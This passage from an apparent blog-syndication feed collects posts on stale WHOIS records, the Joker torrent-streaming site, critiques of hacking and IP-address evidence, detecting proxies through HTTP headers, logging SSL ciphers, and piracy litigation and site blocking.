Until last week, when they got an annoyed rant into their abuse@ mailbox, accusing them of hosting an active spam operation. The guy on duty in the NOC didn’t notice the IP address at first (it was still familiar to him), and he triggered their incident response team, who then rather quickly confirmed: Duh, this ain’t us!

A full 18 months after the old ISP contract expired, it turns out that their entire contact information was still listed in the WHOIS record for that old netblock. After this experience, we ran a quick check on ~20 IP ranges whose owners we knew had changed in the past two years, and it looks like this problem is kinda common: Four of them were indeed still showing old owner and contact information in whois records.

So, if you change IPs, don’t just keep the afterglow in mind, also remember to chase your former ISP until all traces of your contact information are removed from the public records associated with that network.
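
A simple way to act on that advice is to periodically pull the WHOIS record for each former range and scan it for your own identifying strings. A minimal sketch — the org markers and the sample record are hypothetical, and fetching the live record is left out:

```python
# Strings that identify our organization in a WHOIS record (hypothetical).
OUR_MARKERS = ["Example Corp", "abuse@example.com", "noc@example.com"]

def stale_contacts(whois_text, markers=OUR_MARKERS):
    """Return which of our identifying strings still appear in the
    WHOIS record for a netblock we gave back to the ISP."""
    text = whois_text.lower()
    return [m for m in markers if m.lower() in text]

# Hypothetical record for a range returned 18 months ago:
record = """\
NetRange: 192.0.2.0 - 192.0.2.255
OrgName:  Example Corp
OrgAbuseEmail: abuse@example.com
"""
print(stale_contacts(record))  # ['Example Corp', 'abuse@example.com']
```

A non-empty result means the former ISP still hasn’t scrubbed the record, and you can open a ticket before the next misdirected abuse complaint arrives.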

If you have @!#%%%! stories to share about stale whois information, feel free to use the comments below, or our contacts form.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Joker is Cool But Not the New Popcorn Time

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

While BitTorrent’s underlying technology has remained mostly unchanged over the past decade, innovators have found new ways to make it more presentable. Torrent clients have developed greatly and private tracker systems such as’s Gazelle have shown that content can be enhanced with superior cataloging and indexing tools.

This is where Popcorn Time excelled when it debuted earlier this year. While it was the same old torrent content underneath, the presentation was streets ahead of anything seen before. With appetites whetted, enthused BitTorrent fans have been waiting for the next big thing ever since.

Recently, news circulated of a new service that several headlines yesterday heralded as the new Popcorn Time. Joker is a web-based video service with super-clean presentation. Its premise is straightforward – paste in a magnet link or upload a torrent file from your computer, then sit back and enjoy the show.


Not only does Joker work, it does so with elegance. The interface is uncluttered and intuitive and the in-browser window can be expanded to full screen. Joker also provides options for automatically downloading subtitles or uploading your own, plus options for skipping around the video at will.

While these features are enough to please many visitors to the site, the big questions relate to what is going on under the hood.

Popcorn Time, if we’re forced to conduct a comparison, pulls its content from BitTorrent swarms in a way that any torrent client does. This means that the user’s IP address is visible both to the tracker and all related peers. So, has Joker successfully incorporated a torrent client into a web browser to enable live video streaming?

Last evening TF put that question to the people behind Joker, who said they would answer “soon”. Hours later, though, we’re still waiting, so we’ll venture that the short answer is “no”.

Decentralized or centralized? That is the question…

The most obvious clues become evident when comparing the performance of popular and less popular torrents after they’ve been added to the Joker interface. The best seeded torrents not only tend to start immediately but also allow the user to quickly skip to later or earlier parts of the video. This suggests that the video content has been cached already and isn’t being pulled live and direct from peers in a torrent swarm.

Secondly, torrents with fewer seeds do not start instantly. We selected a relatively poorly seeded torrent of TPB AFK and had to wait for the Joker progress bar to wind its way to 100% before we could view the video. That took several minutes, but the video then played super-smoothly – another indication that content is probably being cached.


To be absolutely sure we’d already hooked up Wireshark to our test PC in advance of initiating the TPB AFK download. If we were pulling content from a swarm we might expect to see the IP addresses of our fellow peers sending us data. However, in their place were recurring IP addresses from blocks operated by the same UK ISP hosting the Joker website.
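
The packet-capture observation reduces to a simple test: do all of the apparent “peers” fall inside one hosting provider’s netblock? A hedged sketch of that check — the netblock and captured addresses below are invented documentation-range examples, not the actual ISP ranges from the capture:

```python
import ipaddress

def peers_from_single_block(peer_ips, suspect_net):
    """Return True if every observed 'peer' falls inside one hosting
    provider's netblock -- a hint that the video is being relayed
    from a server-side cache rather than a genuine swarm."""
    net = ipaddress.ip_network(suspect_net)
    return all(ipaddress.ip_address(ip) in net for ip in peer_ips)

# Hypothetical capture: all traffic arriving from one /24.
observed = ["198.51.100.12", "198.51.100.73", "198.51.100.201"]
print(peers_from_single_block(observed, "198.51.100.0/24"))  # True

# A real swarm would show scattered addresses across many networks:
swarm = ["198.51.100.12", "203.0.113.9", "192.0.2.40"]
print(peers_from_single_block(swarm, "198.51.100.0/24"))  # False
```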


Joker is a nice website that does what it promises extremely well and to be fair to its creators they weren’t the ones making the Popcorn Time analogies. However, as a free service Joker faces a dilemma.

By caching video itself, the site is saddled with the same bandwidth costs as functionally similar sites such as YouTube. While Joker provides greater flexibility (users can order it to fetch whichever content they like), it still has to pump video directly to users after grabbing it from torrent swarms. This costs money, and at some point someone is going to have to pay.

In contrast, other than running the software download portal and operating the APIs, Popcorn Time has no direct video-related bandwidth costs since the user’s connection is being utilized for transfers. The downside is that users’ IP addresses are visible to the outside world, a problem Joker users do not have.

Finally and to address the excited headlines, comparing Joker to Popcorn Time is premature. The site carries no colorful and easy to access indexes of movies which definitely makes it a lot less attractive to newcomers. That being said, this lack of content curation enhances Joker’s legal footing.

Overall, demand is reportedly high. The developers told TF last evening that they were “overloaded” and were working hard to fix issues. Currently the service appears stable. Only time will tell how that situation develops.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: No evidence feds hacked Attkisson

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Former CBS journalist Sharyl Attkisson is coming out with a book claiming the government hacked her computer in order to suppress reporting on Benghazi. None of her “evidence” is credible. Instead, it’s bizarre technobabble. Maybe her book is better, but those with advance copies quoting excerpts make it sound like the worst “ninjas are after me” conspiracy theory.

Your electronics are not possessed by demons

Technology doesn’t work by magic. Each symptom has a specific cause.

Attkisson says “My television is misbehaving. It spontaneously jitters, mutes, and freeze-frames”. This is not a symptom of hackers. Instead, it’s a common consumer complaint caused by the fact that cables leading to homes (and inside the home) are often bad. My TV behaves like this on certain channels.

She says “I call home from my mobile phone and it rings on my end, but not at the house”, implying that her phone call is being redirected elsewhere. This is a common problem with VoIP technologies. Old analog phones echoed back the ring signal, so the other side had to actually ring for you to hear it. New VoIP technologies can’t do that. The ringing is therefore simulated and has nothing to do with whether it’s ringing on the other end. This is a common consumer complaint with VoIP systems, and is not a symptom of hacking.

She says that her alarm triggers at odd hours in the night. Alarms work over phone lines and will trigger when power is lost on the lines (such as when an intruder cuts them). She implies that the alarm system goes over the VoIP system on the FiOS box. The FiOS box losing power or rebooting in the middle of the night can cause this. This is a symptom of hardware troubles on the FiOS box, or Verizon maintenance updating the box, not hackers.

She says that her computer made odd “Reeeeee” noises at 3:14am. That’s common. For one thing, when computers crash, they’ll make this sound. I woke two nights ago to my computer doing this, because the WiMax driver crashed, causing the CPU to peg at 100%, the computer to overheat, and the fan to whir at max speed. Another cause could be the nightly Time Machine backup. This is a common symptom of bugs in the system, but not a symptom of hackers.

It’s not that hackers can’t cause these problems, it’s that they usually don’t. Even if hackers have thoroughly infested your electronics, these symptoms are still more likely to be caused by normal failure than by the hackers themselves. Moreover, even if a hacker caused any one of these symptoms, it’s insane to think they caused them all.

Hacking is not sophisticated

There’s really no such thing as a “sophisticated hack”. That’s a fictional trope, used by people who don’t understand hacking. It’s like how people who don’t know crypto use phrases like “military grade encryption” — no such thing exists; the military’s encryption is usually worse than what you have on your laptop or iPhone.

Hacking is rarely sophisticated because the simplest techniques work. Once I get a virus onto your machine, even the least sophisticated one, I have full control. I can view/delete all your files, view the contents of your screen, control your mouse/keyboard, turn on your camera/microphone, and so on. Also, it’s trivially easy to evade anti-virus protection. There’s no need for me to do anything particularly sophisticated.

We experts are jaded and unimpressed. Sure, we have experience with what’s normal hacking, and might describe something as abnormal. But here’s the thing: every hack I’ve seen has had something abnormal about it. Something strange that I’ve never seen before doesn’t make a hack “sophisticated”.

Attkisson quotes an “expert” using the pseudonym “Jerry Patel” saying that the hack is “far beyond the abilities of even the best nongovernment hackers”. Government hackers are no better than nongovernment ones — they are usually a lot worse. Hackers can earn a lot more working outside government. Government hackers spend most of their time on paperwork, whereas nongovernment hackers spend most of their time hacking. Government hacker skills atrophy, while nongovernment hackers get better and better.

That’s not to say government hackers are crap. Some are willing to forgo the larger paycheck for a more stable job. Some are willing to put up with the nonsense in government in order to be able to tackle interesting (and secret) problems. There are indeed very good hackers in government. It’s just that it’s foolish to assume that they are inherently better than nongovernmental ones. Anybody who says so, like “Jerry Patel”, is not an expert.

Contradictory evidence

Attkisson quotes one expert as saying intrusions of this caliber are “far beyond the abilities of even the best nongovernment hackers”, while at the same time quoting another expert saying the “ISP address” is a smoking gun pointing to a government computer.

Both can’t be true. Hiding one’s IP address is the first step in any hack. You can’t simultaneously believe that these are the most expert hackers ever for deleting log files, but that they make the rookie mistake of using their own IP address rather than anonymizing it through Tor or a VPN. It’s almost always the other way around: everyone (except those like the Chinese who don’t care) hides their IP address first, and some forget to delete the log files.

Attkisson quotes experts saying non-expert things. Patel’s claims about logfiles and government hackers are false. Don Allison’s claim about IP addresses being a smoking gun is false. It may be that the people she’s quoting aren’t experts, or that her ignorance causes her to misquote them.


Attkisson quotes an expert as identifying an “ISP address” of a government computer. That’s not a term that has any meaning. He probably meant “IP address” and she’s misquoting him.

Attkisson says “Suddenly data in my computer file begins wiping at hyperspeed before my very eyes. Deleted line by line in a split second”. This doesn’t even make sense. She claims to have videotaped it, but if this is actually a thing, it sounds more like something kids do to scare people, not what real “sophisticated” hackers do. Update: she has released the video; the behavior is identical to a stuck delete/backspace key, and not evidence of hackers.

So far, none of the quotes I’ve read from the book use any technical terminology that I, as an expert, feel comfortable with.

Lack of technical details

We don’t need her quoting (often unnamed) experts to support her conclusion. Instead, she could just report the technical details.

For example, instead of quoting what an expert says about the government IP address, she could simply report the IP address. If it’s “75.748.86.91”, then we can judge for ourselves whether it’s the address of a government computer. That’s important because nobody I know believes that this would be a smoking gun — maybe if we knew more technical details she could change our minds.

Maybe that’s in her book, along with pictures of the offending cable attached to the FiOS ONT, or the pictures of her screen deleting at “hyperspeed”. So far, though, none of those with advance copies have released these details.

Lastly, she’s muzzled the one computer security “expert” that she named in the story so he can’t reveal any technical details, or even defend himself against charges that he’s a quack.


Attkisson’s book isn’t out yet. The source material for this post is from those with advance copies quoting her [1][2]. But, everything quoted so far is garbled technobabble from fiction rather than hard technical facts.

Disclosure: Some might believe this post is from political bias instead of technical expertise. The opposite is true. I’m a right-winger. I believe her accusations that CBS put a left-wing slant on the news. I believe the current administration is suppressing information about the Benghazi incident. I believe journalists with details about Benghazi have been both hacked and suppressed. It’s just that in her case, her technical details sound like a paranoid conspiracy theory.

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyers Club LLC (DBCLLC) requires a minimum of difficulty, since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defense to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China“. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned since I cannot identify individual users. However, the proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify whose request is being relayed. This added information is stuffed in HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from that contained the HTTP header “X-Forwarded-For:″. If I were to ban the user, then I would ban “”, since that system connected to my server. However, is and is part of a proxy network. This proxy network identified who was relaying with the X-Forwarded-For header. In this case, “” is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.
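As a sketch of how that lookup might work, the snippet below scans a request's headers for the forwarding fields named above and collects any relayed client addresses. The header dictionary and function name are illustrative, not the site's actual code:

```python
# Known forwarding headers from the post; names vary by proxy vendor.
FORWARD_HEADERS = [
    "X-Forwarded-For",
    "X-Forwarded",
    "Forwarded-For-IP",
    "Forwarded",
    "Via",
    "HTTP_X_FORWARDED_FOR",  # seen verbatim in the wild, per the post
]

def forwarded_clients(headers):
    """Return candidate relayed-client values from a request's headers."""
    # HTTP header names are case-insensitive, so normalize first.
    lowered = {k.lower(): v for k, v in headers.items()}
    candidates = []
    for name in FORWARD_HEADERS:
        value = lowered.get(name.lower())
        if value:
            # X-Forwarded-For may carry a chain: "client, proxy1, proxy2"
            candidates.extend(part.strip() for part in value.split(","))
    return candidates
```

Anything this returns is a candidate for the real user; if it returns nothing, the connecting address is all there is to ban.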

In some cases, I see the direct connection address also listed as the relayed address; it claims to be relaying itself. I suspect that this is caused by some kind of anti-virus system that is filtering network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123”. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with its own proxy identifier. Fortinet’s software adds in an “X-FCCKV2” header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.
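One way to act on such fingerprints is to shorten the ban whenever a proxy marker is present. This is a hypothetical sketch: the header names come from the post, but the durations and policy are made up for illustration:

```python
# Header names that betray a proxy, taken from the post; the ban
# durations are illustrative policy, not the site's real configuration.
PROXY_MARKERS = {"x-bluecoat-via", "x-fcckv2", "x-uidh",
                 "via", "x-forwarded-for"}

def ban_duration_days(headers):
    """Shorter ban for proxies so other users of the proxy suffer less."""
    present = {name.lower() for name in headers}
    if present & PROXY_MARKERS:
        return 1    # identified proxy: ban a day instead of months
    return 90       # direct connection: the usual three-month ban
```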

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5” says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.
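Parsing that header is straightforward; a minimal sketch (not production-grade RFC parsing) might look like:

```python
def parse_accept_language(value):
    """Parse an Accept-Language header into (tag, weight) pairs, best first."""
    langs = []
    for part in value.split(","):
        piece = part.strip()
        if not piece:
            continue
        if ";q=" in piece:
            tag, _, q = piece.partition(";q=")
            try:
                weight = float(q)
            except ValueError:
                weight = 0.0  # malformed q-value: rank it last
        else:
            tag, weight = piece, 1.0  # no q-value means full weight
        langs.append((tag.strip(), weight))
    return sorted(langs, key=lambda tw: tw[1], reverse=True)
```

For the example above, this yields en-US first, then en at half weight.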

Similarly, Facebook can relay network requests. These appear with the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook is being used as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from German). However, without the official header, would I choose Spanish from Latin America (“es-LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of those other fields? (Fortunately, in the real world these would likely all be the same. And you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)
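A resolution policy like the one just described – official header first, then the unofficial fields – could be sketched as follows. The priority ordering and the hint names are assumptions for illustration, not a standard:

```python
# Preference order when language hints conflict: the official header
# wins, then unofficial sources in a fixed (arbitrary) order.
PRIORITY = [
    "accept-language",          # the only official header
    "user-agent-locale",        # locale extracted from the UA string
    "x-facebook-locale",
    "x-avantgo-clientlanguage",
]

def pick_language(hints):
    """hints: dict mapping source name -> language tag (or missing)."""
    for source in PRIORITY:
        tag = hints.get(source)
        if tag:
            return tag
    return None  # no usable hint at all
```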

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL fire drill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. Whether or not you decide to turn off SSLv3 depends a lot on who needs it, and it is an important answer to have ready should some other cipher turn out to be too weak tomorrow.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variables [1]. For example:
CustomLog logs/ssl_request_log "%t %h \"%{User-agent}i\" %{SSL_PROTOCOL}x %{SSL_CIPHER}x"

Logs SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add User-Agent and IP Address (as well as time stamp).

In nginx, you can do the same by adding $ssl_cipher and $ssl_protocol to the log_format directive in your nginx configuration. For example:

log_format ssl '$remote_addr "$http_user_agent" $ssl_cipher $ssl_protocol';

This should give you a similar result as the Apache example above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With tshark, you can actually get a bit further: you can log the client hello with whatever ciphers the client proposed, and the server hello, which will indicate what cipher the server picked.

tshark -r ssl -2 -R "ssl.handshake.type==2 or ssl.handshake.type==1" -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect Real Data as to what ciphers are needed, but you can also look for anomalies. For example, user agents that request very different ciphers than other connections that claim to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign of an SSL downgrade attack? Or an attack tool using an older SSL library…
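Once the protocol and cipher are in the log, a quick tally finds the outliers. This sketch assumes a log format where protocol and cipher are the last two whitespace-separated fields, as in the Apache example above:

```python
from collections import Counter

def tally(lines):
    """Count (protocol, cipher) pairs from the custom SSL log."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        if len(fields) >= 2:
            # Assumes the log writes protocol then cipher at the end.
            proto, cipher = fields[-2], fields[-1]
            counts[(proto, cipher)] += 1
    return counts
```

Sorting the counter then shows at a glance whether that lone SSLv3 connection is a forgotten appliance or something more suspicious.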


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

When copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe, and are living proof that while The Pirate Bay might be the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites such as Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month but the Hollywood-affiliated group has now admitted that it has had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Using a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sector, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally broader than those in the UK, covering the country’s eight largest service providers and affecting around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” featuring good and bad sides, Müller says that when ordering website blocks the courts will always appreciate the right to freedom of expression.

“But there’s no human right to Bruce Willis,” he concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is most well known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. A Danish-language publication that has provided good coverage of the whole trial reports that deputy prosecutor Anders Riisager used an analogy to describe the prosecution’s position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid’s] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SD card key, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing on there of significance. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

